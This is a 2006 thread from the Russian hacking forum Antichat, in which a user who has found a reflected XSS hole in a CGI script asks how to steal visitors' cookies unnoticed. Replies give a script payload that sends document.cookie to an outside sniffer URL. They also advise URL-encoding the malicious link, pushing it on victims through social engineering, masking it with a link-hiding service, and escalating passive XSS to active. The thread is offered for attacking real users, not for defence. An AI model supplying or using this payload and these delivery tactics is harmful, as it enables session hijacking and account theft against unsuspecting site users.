Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Подскажите по Xss (https://forum.antichat.xyz/showthread.php?t=17079)

Laggi 04.04.2006 23:49
Подскажите по Xss
 
Нашел XSS уязвимость... в запросе .cgi файла... могу в хтмл-код внедрить любой другой хтмл код :-)
Что дальше сделать можно?

К примеру как беспалева потырить кукизы.. ведь не пошлешь же ты напрямую ссылку со скриптами :)

porter 05.04.2006 03:05
Заныкай ссылку со скриптами здесь - http://loc.netsec.ru/create.html

NaX[no]rT 05.04.2006 03:09
Если можешь внедрить, так внедряй снифер и всё. Проблема то в чём, не знаешь как? вот, попробуй вставь вот это
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

Laggi 05.04.2006 11:13
Цитата:
Сообщение от NaX[no]r†
Если можешь внедрить, так внедряй снифер и всё. Проблема то в чём, не знаешь как? вот, попробуй вставь вот это
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
гммм... дело в том, что ХСС видимо пассивный, при гет запросе к примеру могу вставить:
patt="><script>alert(document.cookie)</script>
Вот... гм... как бы его протолкнуть...

Otaku 05.04.2006 17:48
СИ применить. Хотя весьма не надёжно.

drmist 05.04.2006 18:21
Я предлогаю ознакомится со следующей статьей.
Мне говорили, что она интересная )))
http://www.security-teams.net/index.php?showtopic=2492

PinkPanther 10.04.2006 23:10
1. переводиш ссылку со скриптом в ури кодировку, и методом СИ париш жертве.
2. поступаеш тем способом что описал я в статье про взлом аккаунтов на народе, или Censored про взлом аккаунтов на форуме Хакера, т.е. из пассива как бы делаеш актив.
3. побольше фантазии!!! ))

alex-19841 09.05.2006 12:57
porter
Пример можешь показать как заныканой ссылкой пользоваться


Время: 15:12